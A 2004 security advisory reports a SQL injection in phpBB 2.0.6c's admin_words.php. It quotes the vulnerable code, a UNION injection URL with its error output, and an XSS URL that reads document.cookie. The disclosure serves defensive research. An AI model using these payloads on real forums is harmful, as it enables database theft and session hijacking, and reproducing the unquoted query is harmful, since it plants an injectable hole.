<<< Date Index >>>     <<< Thread Index >>>

[waraxe-2004-SA#009 - Non-critical Sql injection and XSS bug in PhpBB 2.0.6c]




{================================================================================}
{                              [waraxe-2004-SA#009]                             
 }
{================================================================================}
{                                                                               
 }
{            [ Non-critical Sql injection and XSS bug in PhpBB 2.0.6c ]         
 }
{                                                                               
 }
{================================================================================}
                                                                                
                                                
Author: Janek Vind "waraxe"
Date: 16. March 2004
Location: Estonia, Tartu



Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PhpBB is widely used and very popular forum software, written in php.
Homepage:  http://www.phpbb.com/


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Original code from  admin_words.php, $Id: admin_words.php,v 1.10.2.2 2002/05/12 
15:57:45,
starting from line 74:

-------------------------------

if( $mode == "edit" )
                {
                        if( $word_id )
                        {
                                $sql = "SELECT * 
                                        FROM " . WORDS_TABLE . " 
                                        WHERE word_id = $word_id";
                                if(!$result = $db->sql_query($sql))
                                {
                                        message_die(GENERAL_ERROR, "Could not 
query words table", "Error", __LINE__, __FILE__, $sql);
                                }

                                $word_info = $db->sql_fetchrow($result);
                                $s_hidden_fields .= '<input type="hidden" 
name="id" value="' . $word_id . '" />';
                        }
                        else
                        {
                                message_die(GENERAL_MESSAGE, 
$lang['No_word_selected']);
                        }
                }

--------------------------------

As we can see, parameter $word_id is submitted to sql query WITHOUT single 
quotes, therefore
it's possible sql injection, for example with UNION method:

 
http://localhost/phpbb206c/admin/admin_words.php?mode=edit&id=-1%20UNION%20ALL%20SELECT%20null/*

and we get error feedback:

------------------------------------------------

Error Could not query words table

DEBUG MODE

SQL Error : 1222 The used SELECT statements have a different number of columns

SELECT * FROM phpbb_words WHERE word_id = -1 UNION ALL SELECT null/*

Line : 83
File : D:\apache_wwwroot\phpbb206c\admin\admin_words.php

------------------------------------------------

By implementing so-called "blind" sql injection methods, we can pull out from 
sql database any
information. So why i'm categorizing this bug as "non-critical"? Because we 
need first log in as 
forum administrator to make successful attack. So it's not so "useful" security 
bug ;)
But let's think again - what, if we make such request:


http://localhost/phpbb206c/admin/admin_words.php?mode=edit&id=1/*";>&lt;script&gt;alert(document.cookie);</script
 

So, in this way we can turn not-so-useful sql injection bug to very useful xss 
exploit.




Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to torufoorum staff and to all IT security related people in 
Estonia! Tervitused!
Special greets to ulljobu!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@xxxxxxxxx
    Janek Vind "waraxe"

---------------------------------- [ EOF ] ------------------------------------